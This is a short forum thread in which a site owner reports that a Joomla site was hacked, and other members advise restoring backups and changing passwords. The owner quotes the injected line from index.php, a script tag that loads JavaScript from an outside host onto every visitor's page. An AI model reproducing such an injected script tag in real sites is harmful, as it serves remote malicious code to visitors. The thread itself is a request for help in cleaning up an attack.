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  • christool Friend

    Helo guys,
    I installed JA Opal 2 months ago. everuthing was ok, but and last night it had been hacked…

    The hacker has modified at least 2 files, index.php and configuration.php

    When visitors went on the website an error message regarding lone 90 appeared, some of them had an alert regarding virus… In the index.php files on line 90, i found that :

    echo JResponse::toString($mainframe->getCfg(‘gzip’));
    <script src=http://cgi35.plala.or.jp/BTO/data/entry/css.js></script>

    Can anyone help me to fix the hack please ?

    It is really urgent, this website is the one of the main french enduro race that will occured in one week…

    The website is no longer available, i deleted the 2 modified files.


    mj1256 Friend

    they got more files that that, it looks like the Jredirector worm.

    best to restore from your lats backup, then change all of your server and site passwords. You DB is fine and untouched.

    your host should do it for you, happened to me saturday on one of my sites, total down time, 20 minutes, host used last backup to restore. no extra charge

    christool Friend

    Thank you.
    I did a new install and overwrite all the old files and changed all the passwords. I hope that they did not put new files when they did the hack… I t looks as if the host do not have a back up.


    nguyenhuu quang Friend

    New install at localhost and Delete your code on live site , Upload to your host and edit configurations(
    Check all your acc called administrator,and superadmin groups)

    questbg Friend

    You may want to consider JoomlaPack too so you can save zipped backups locally. These are really easy to restore if you ever have the problem.

    christool Friend

    Ok thanks for the advices guys.

Viewing 6 posts - 1 through 6 (of 6 total)

This topic contains 6 replies, has 4 voices, and was last updated by  christool 15 years, 8 months ago.

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